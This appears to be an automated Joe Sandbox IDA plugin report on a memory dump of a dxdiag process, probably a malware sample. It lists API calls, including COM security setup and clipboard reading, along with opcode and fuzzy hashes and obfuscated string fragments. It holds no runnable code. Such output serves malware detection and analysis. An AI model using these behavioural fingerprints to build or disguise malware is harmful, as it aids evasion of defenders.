                                                                                                      • API String ID: 2994545307-3214320781
                                                                                                      • Opcode ID: 5931b0502365ebbec1996e2a82422ef558332029e6c540395b09d36738237def
                                                                                                      • Instruction ID: 7a21dba1f6b4e75eed38616ab3744ad9dd1eab9b40c1e5948c0a189561833efb
                                                                                                      • Opcode Fuzzy Hash: 5931b0502365ebbec1996e2a82422ef558332029e6c540395b09d36738237def
                                                                                                      • Instruction Fuzzy Hash: C3914B76B047105BD7149E24ECC2B7B73A2EBC1318F98843EE94687396E67C9C05D399
                                                                                                      APIs
                                                                                                      • LdrInitializeThunk.NTDLL(0043C1EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: /J x
                                                                                                      • API String ID: 2994545307-1866642894
                                                                                                      • Opcode ID: f30544c505241ad8f6770229db064c02dd71acb82eae6ebeaea714bf93423867
                                                                                                      • Instruction ID: 874112095a5efa33bfbcb898a975de2e52caa01511d8d9f4d2bd4c75d1d74cee
                                                                                                      • Opcode Fuzzy Hash: f30544c505241ad8f6770229db064c02dd71acb82eae6ebeaea714bf93423867
                                                                                                      • Instruction Fuzzy Hash: 55518A71A043008FE724EE299C8166BF7A2EBC9714F299A3EE58457381DE389C018799
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: @
                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                      • Opcode ID: 0a54cfb0382d90671bf8a8549960c687a3425552f5adc6159ffc4faefce21d6a
                                                                                                      • Instruction ID: a35a6d60c968e134acf55cef92dc51cc7359e84a70f9638e84e2e7fd5f809bf1
                                                                                                      • Opcode Fuzzy Hash: 0a54cfb0382d90671bf8a8549960c687a3425552f5adc6159ffc4faefce21d6a
                                                                                                      • Instruction Fuzzy Hash: D53102B15083048BD314EF14C8C16AFF7F5EF9A320F15A92EE99557390D3799848CB9A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 5ce9da3ec3eabb230dc047e1443a7ed10ff4abf91167f9ef0f8a3aa1cfdc4362
                                                                                                      • Instruction ID: 9a74d657e93f8d3f5cf240051ad191b629485e22a32f0a110a3d4ded04f7e6bd
                                                                                                      • Opcode Fuzzy Hash: 5ce9da3ec3eabb230dc047e1443a7ed10ff4abf91167f9ef0f8a3aa1cfdc4362
                                                                                                      • Instruction Fuzzy Hash: 4FA12532A083114BD314CE28D89156BBBE2EBDA314F29EA3EE9A597351D738DC05C785
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: b70ec3a45a838298925cd4cddba91232df754bc9f20b4abfcf63beb9f04927e9
                                                                                                      • Instruction ID: 1330599076484d40c3e41ed8303109be540c1e7eaad1d2ba3b2e5e3a43da2089
                                                                                                      • Opcode Fuzzy Hash: b70ec3a45a838298925cd4cddba91232df754bc9f20b4abfcf63beb9f04927e9
                                                                                                      • Instruction Fuzzy Hash: E07133316043018BD714EF28D8D1A7FB7E2EB89310F19E53EE8899B391DB389C409789
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d7d9fbbb4968f9e9959b441f158be0a7c4b757bd456b857d1f889996084494c4
                                                                                                      • Instruction ID: 058e7eb1b77869290f7d29a5434ce18bf9e6f536ede9c38a5ab45312e861f76d
                                                                                                      • Opcode Fuzzy Hash: d7d9fbbb4968f9e9959b441f158be0a7c4b757bd456b857d1f889996084494c4
                                                                                                      • Instruction Fuzzy Hash: 79A1073250C7818FD3149B38885126FBBD25BCA324F194B6EE5EA473D1D678C941C74B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: ddc78d1b04d6bec4008d7390ca24b1b937114dd695eca5aeaa2e66312c2f3a60
                                                                                                      • Instruction ID: 862a6d1eb3e04205f618e8bd76b9e7ff9fb97f5fdbb19bdb3795918c96e67ed1
                                                                                                      • Opcode Fuzzy Hash: ddc78d1b04d6bec4008d7390ca24b1b937114dd695eca5aeaa2e66312c2f3a60
                                                                                                      • Instruction Fuzzy Hash: EF3179726805018BDB1CDB28DC91A7E7362EB5E324F2A572ED492B77E1C7389C12C749
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 343dc57fd85ca318e9cab81e4ba610ce05acd3c36ba71d43b9120f80a9a00c8a
                                                                                                      • Instruction ID: 01ca3aed7babf808add9e7fd7257d4aa18570a6a75482a61117814391ff3c097
                                                                                                      • Opcode Fuzzy Hash: 343dc57fd85ca318e9cab81e4ba610ce05acd3c36ba71d43b9120f80a9a00c8a
                                                                                                      • Instruction Fuzzy Hash: AA31BF76B10A008BD728CF29C851B26B7E3BFC6304F19D12DD09AC77A5EB78A8018B54

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 480 40cc16-40cd80 CoInitializeEx * 2
                                                                                                      APIs
                                                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0040CC1A
                                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD67
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID: (02N
                                                                                                      • API String ID: 2538663250-482182587
                                                                                                      • Opcode ID: 5dda1f8ef3903148d2f90ff3463849efe98f65f23156c3258cfb4110ce7950d6
                                                                                                      • Instruction ID: d17696292bc297aee8fb915d5703223a9b482fd72e7288d2817973478bab555f
                                                                                                      • Opcode Fuzzy Hash: 5dda1f8ef3903148d2f90ff3463849efe98f65f23156c3258cfb4110ce7950d6
                                                                                                      • Instruction Fuzzy Hash: 3E41B6B4D10B40AFD370EF39DA0B7127EB4AB05250F504B2DF9EA866D4E631A4198BD7
                                                                                                      APIs
                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CDB7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeSecurity
                                                                                                      • String ID: Nf
                                                                                                      • API String ID: 640775948-501009845
                                                                                                      • Opcode ID: cc0bac53719f05fd76b6ebac675668444252fa88d21156f1485ccdb508311816
                                                                                                      • Instruction ID: d4c561bf1a5b18bbc5a108682527e0612a5fd10810c78835407b1c78b182e784
                                                                                                      • Opcode Fuzzy Hash: cc0bac53719f05fd76b6ebac675668444252fa88d21156f1485ccdb508311816
                                                                                                      • Instruction Fuzzy Hash: 8AD092347D4240BAE2249708AC17F1022119302F55F300226B363EE2E0D9907141860D
                                                                                                      APIs
                                                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 004331B5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLanguageUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 95929093-0
                                                                                                      • Opcode ID: 2f573e232fa3002a4601395236eb5b6ae86ddd1d5b3cef5a9b094565ea09aab7
                                                                                                      • Instruction ID: 3dcccac6d406af36a65d69c1e0d77e321988698b0dd3df6f47d0d67d5a4e7b69
                                                                                                      • Opcode Fuzzy Hash: 2f573e232fa3002a4601395236eb5b6ae86ddd1d5b3cef5a9b094565ea09aab7
                                                                                                      • Instruction Fuzzy Hash: 5A119435A055848FCB19CF38CC54B5ABFF16F4B201F09C1EED95997392CA349909CB11
                                                                                                      APIs
                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?,00000000,-00001000,0043634D,00000000,-00001000,00000040,?,00000000), ref: 00439E12
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: eb7d745538af2e112f280afb521d2e7db1d87c50453d574173b658df3250f6e1
                                                                                                      • Instruction ID: f371fc5d33ece009c4c3a0571b7c3e2245088c9ce721a5e6db8221790f4f6db8
                                                                                                      • Opcode Fuzzy Hash: eb7d745538af2e112f280afb521d2e7db1d87c50453d574173b658df3250f6e1
                                                                                                      • Instruction Fuzzy Hash: 99E02B76514710EBC6005F64BC07B1B3B64EF8A712F01083AF44496152DB38E801C5EF
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BlanketProxy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3890896728-0
                                                                                                      • Opcode ID: f066d8136630dc46cb24742ad5accdc9ac96aa1f0028cb8de37fa5b4ae37cf04
                                                                                                      • Instruction ID: 92cf7cd52a0b26c4ab4cf5037d2a8ef19b8d3357c895488f279ef1d82b73d9c3
                                                                                                      • Opcode Fuzzy Hash: f066d8136630dc46cb24742ad5accdc9ac96aa1f0028cb8de37fa5b4ae37cf04
                                                                                                      • Instruction Fuzzy Hash: 3AF0B7B45087018FE314DF29D5A8716BBF0FB84304F10891CE4968B391CBB5A648CF86
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BlanketProxy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3890896728-0
                                                                                                      • Opcode ID: 2b6c7347b63c56c7ba1f0f97762e9121d9dc5645105ebc7166e137d76f548b4c
                                                                                                      • Instruction ID: 0899820397365732e2da90ce65a4afed0ef7eceabc5b433f77fa9bfe01264dcb
                                                                                                      • Opcode Fuzzy Hash: 2b6c7347b63c56c7ba1f0f97762e9121d9dc5645105ebc7166e137d76f548b4c
                                                                                                      • Instruction Fuzzy Hash: BFF0DA745093018FD314DF29D0A871BBBE0FB88714F00891CE4958B390DB75A648CF82
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000), ref: 0043862D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 3298025750-0
                                                                                                      • Opcode ID: 27747b72a67b977cf105f9c95d7ced292bc03dc07a125d0771843c6e3fd466d0
                                                                                                      • Instruction ID: 4b498aae19b3e6e4938b8adf9d962b10c79c0f4802967231e3dbdd59588952b8
                                                                                                      • Opcode Fuzzy Hash: 27747b72a67b977cf105f9c95d7ced292bc03dc07a125d0771843c6e3fd466d0
                                                                                                      • Instruction Fuzzy Hash: 7DC08C31404A26EBCA102F18BC07BCA3A20DF0A321F0308A1F900980B6C739DC92C9DC
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,00000000,00414C1F,00000400), ref: 004385F0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: bca7d58748ae5aecf304c81bf07840e3b5a28b072888644e0b079d4f2959ecbd
                                                                                                      • Instruction ID: 1ff8db07d7a6c5951f5da3d7f0bd717f597c0928698ba3c33e75086f2b70e91b
                                                                                                      • Opcode Fuzzy Hash: bca7d58748ae5aecf304c81bf07840e3b5a28b072888644e0b079d4f2959ecbd
                                                                                                      • Instruction Fuzzy Hash: 3CC04C35445220AAC6106B15EC05B867B54DF49351F014055B104660728760AC418AD9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $!$"$"$#$$$$$$$&$&$($)$+$-$/$0$3$4$5$7$9$9$9$:$;$;$;$<$<$=$=$=$>$?$@$@$A$A$A$B$C$D$D$E$F$G$H$H$I$K$K$K$M$M$N$O$O$Q$Q$R$S$U$W$W$W$Y$Y$Z$[$]$_$`$a$a$a$c$c$d$e$e$f$f$g$g$g$g$i$k$m$o$o$p$p$q$r$s$t$v${$|$}$}
                                                                                                      • API String ID: 0-2298439183
                                                                                                      • Opcode ID: 2fca1a34db66d2f979c72fa397fdd48071d883c2b4100c1f0ee5dc9a809098c4
                                                                                                      • Instruction ID: 083fd10bc4ed8af0561365f8755418076205ed3f8dd68f74a68bf74da31982d7
                                                                                                      • Opcode Fuzzy Hash: 2fca1a34db66d2f979c72fa397fdd48071d883c2b4100c1f0ee5dc9a809098c4
                                                                                                      • Instruction Fuzzy Hash: 8E13B23160C7C18AD335CB38845539FBBE2ABD6324F188A6EE4E9873D2D6788542C757
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 29B$8X$CH$GP$JY$O:$OM$R\$^E$rs$rM$uv${w$02$46$GI$|~
                                                                                                      • API String ID: 0-2187006609
                                                                                                      • Opcode ID: ecc0fc787c0b6cd285c1698c568045089e0644926ad2ac97ce3fe72f36c1f917
                                                                                                      • Instruction ID: 571314284cfc883063d67328f2f268305e4fa17690c0835aa9d0b0b07ad656d6
                                                                                                      • Opcode Fuzzy Hash: ecc0fc787c0b6cd285c1698c568045089e0644926ad2ac97ce3fe72f36c1f917
                                                                                                      • Instruction Fuzzy Hash: 37421DB564C3818AD330CF54D842B9FBAF2EBD2300F00892DD5E96B256C775864ADB97
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #$&$)$-$<$H$[$[$\$\$\$]$]$q$y$|$~
                                                                                                      • API String ID: 0-875500967
                                                                                                      • Opcode ID: 3bcbecbddcf8bc29a05a5b43c94189d71db8383b50a5ea400568bbe92f363e52
                                                                                                      • Instruction ID: 5554db80201a8ba6ea3474702efe9192065d530e6ae71f569cd6bb248edef4d2
                                                                                                      • Opcode Fuzzy Hash: 3bcbecbddcf8bc29a05a5b43c94189d71db8383b50a5ea400568bbe92f363e52
                                                                                                      • Instruction Fuzzy Hash: 4FB10A23A1D7904AE314897C884535B9EC31BE6224F2ECB6DD8E5973C2D57DC9068393
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                      • String ID: !$#$$$m$o$r
                                                                                                      • API String ID: 2832541153-1228291082
                                                                                                      • Opcode ID: 9aabbc75b445cbdc09f20715aaa2dda78bd6a68a7388c67d93f533054e1a149d
                                                                                                      • Instruction ID: 5f04a8027e3d7a55f1d66e97924e677b1801266d210010e4a128a03f4dc74b7a
                                                                                                      • Opcode Fuzzy Hash: 9aabbc75b445cbdc09f20715aaa2dda78bd6a68a7388c67d93f533054e1a149d
                                                                                                      • Instruction Fuzzy Hash: CC41907160C3818FD300EF78959935EBFE0AB95308F08593EE4C987292D6BD85499B5B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: *Z/\$-R?T$0J4L$3N#@$<F9X$<^#P$C>K0$G6DH$K:^<$M"`$$M*T,$P&U8$UV$Z.\ $g2V4$RT
                                                                                                      • API String ID: 0-3486322482
                                                                                                      • Opcode ID: ce30911c56949484c871613a9b58aee768a7c3ed8897db213ed400ca2e5a3e73
                                                                                                      • Instruction ID: bfdc5e733220a4266b0cee0809eb26845f7d15cd3bd46db4d77d1dfb423e5921
                                                                                                      • Opcode Fuzzy Hash: ce30911c56949484c871613a9b58aee768a7c3ed8897db213ed400ca2e5a3e73
                                                                                                      • Instruction Fuzzy Hash: 14B199B45093918BD7348F29C4907EBBBE0AF96304F558A2DD8C95B390DB798885CB87
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: =?$$q?s$'m&o$,Yu[$5Q0S$8I&K$8uZw$HiBk$O;$W;$WaLc$WePg$iAbC$i]m_${-G/
                                                                                                      • API String ID: 0-2287720743
                                                                                                      • Opcode ID: a8e193ca5121b7fe708194ddb65a1b39536846b7ffe5ce25fb94a828c6cf7a23
                                                                                                      • Instruction ID: 29238d0ecd9fd652967a2f07aa34a714a27bdb8438f077e70085c6c9b953e65e
                                                                                                      • Opcode Fuzzy Hash: a8e193ca5121b7fe708194ddb65a1b39536846b7ffe5ce25fb94a828c6cf7a23
                                                                                                      • Instruction Fuzzy Hash: BAC1ABB4200301CFDB288F25D8917567BA1FB45310F2586BDDC5A9F29ADB34D842CF94
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1>?<$AHAq$ASSU$R][j$R_QQ$UaUQ$[]SN$_s$$bs$$e$ubk$$}nn~
                                                                                                      • API String ID: 0-3156591309
                                                                                                      • Opcode ID: 84e542dcf362c4722633b38991b48ed42a758c2a9ed69d5e91c7dd3c190ae891
                                                                                                      • Instruction ID: cb5f53731036b88b860b65b87d3060a00e5eb7a07e2cb5fd5f7d8ae11adf455f
                                                                                                      • Opcode Fuzzy Hash: 84e542dcf362c4722633b38991b48ed42a758c2a9ed69d5e91c7dd3c190ae891
                                                                                                      • Instruction Fuzzy Hash: 8852577590C3518FC725CF25C8407ABBBE1AF86304F084A6DE8E59B382D739D906CB96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: <=$BdB$jdB$r`B$~bB$7#v
                                                                                                      • API String ID: 0-226281226
                                                                                                      • Opcode ID: 7283b4ef89dd7f4654847078150be036275240888603589d3de15dc1c6c1ce9b
                                                                                                      • Instruction ID: 340aef6d2692e72857662edcd36e925b24db6bbbcaf4b5bc792621142b15778b
                                                                                                      • Opcode Fuzzy Hash: 7283b4ef89dd7f4654847078150be036275240888603589d3de15dc1c6c1ce9b
                                                                                                      • Instruction Fuzzy Hash: 82E123B560C3808BD734DF24D85276BBBE1FB82314F05892DE0D69B352EB798501CB8A
                                                                                                      APIs
                                                                                                        • Part of subcall function 00439E40: LdrInitializeThunk.NTDLL(0043C1EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E6E
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00419CA6
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00419D0B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary$InitializeThunk
                                                                                                      • String ID: I,~M$J,I.$ST$#v
                                                                                                      • API String ID: 764372645-3166301710
                                                                                                      • Opcode ID: d890d32fbb13f0df0ad3a9381c1ff360bd9b398ea0201f9c1d6794e8eacfa1d7
                                                                                                      • Instruction ID: 3a946de6d06df9888b19065ab5da8f4f8076a039cb09845347bca5e298d55306
                                                                                                      • Opcode Fuzzy Hash: d890d32fbb13f0df0ad3a9381c1ff360bd9b398ea0201f9c1d6794e8eacfa1d7
                                                                                                      • Instruction Fuzzy Hash: ED8229746083409BE714DF24D890BAFBBE2EBD6314F28892DE58547392D779DC81CB4A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: )$A}A$C$H$N$cp$h{A$ts
                                                                                                      • API String ID: 0-2460436281
                                                                                                      • Opcode ID: e72cfd5e58267174583cb2aefa18fb3aa2280ca7967e1c0677e4e59f799665dc
                                                                                                      • Instruction ID: c091a61c3610e84d45043be11fa95010c19d3da449df3a573e39c3d9f215f14f
                                                                                                      • Opcode Fuzzy Hash: e72cfd5e58267174583cb2aefa18fb3aa2280ca7967e1c0677e4e59f799665dc
                                                                                                      • Instruction Fuzzy Hash: EFF14375A083518BD714DF28C8906ABB7F2FFD5314F188A2DE4C98B391EB389941C796
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LS`$QS`$^=$ca}`$f}oe$v$zE$
                                                                                                      • API String ID: 0-1738842590
                                                                                                      • Opcode ID: 3b1b216516dbc741a7d0b8159a95c0c4f5c0bb8da2b18092da4a11f8244ac20c
                                                                                                      • Instruction ID: 8397652dd6c80c3d6384abaef94ac051be11649c1be440025a567e8f984c36e4
                                                                                                      • Opcode Fuzzy Hash: 3b1b216516dbc741a7d0b8159a95c0c4f5c0bb8da2b18092da4a11f8244ac20c
                                                                                                      • Instruction Fuzzy Hash: C0C1E77260C3918BC326CF69849076BFFE1AF96310F094A6DE4D55B382D3798D0AC796
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: !YZ[$'I8K$(MO$*O$1Q<S$5U$W$7E%G$vw
                                                                                                      • API String ID: 0-110145457
                                                                                                      • Opcode ID: 9732b06a73e385f885b5dbe102d8aac1c51981338c974522d8cbeaa61a1d13e9
                                                                                                      • Instruction ID: 1450f61bfb5304e21163cb8565421a3d7c92680fc4378e386598e8c3f998bcbb
                                                                                                      • Opcode Fuzzy Hash: 9732b06a73e385f885b5dbe102d8aac1c51981338c974522d8cbeaa61a1d13e9
                                                                                                      • Instruction Fuzzy Hash: B2B1C1B6A1C3618BC724CF19A84166BB7F1EFC1304F14882DE9899B341E778D50ACB86
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
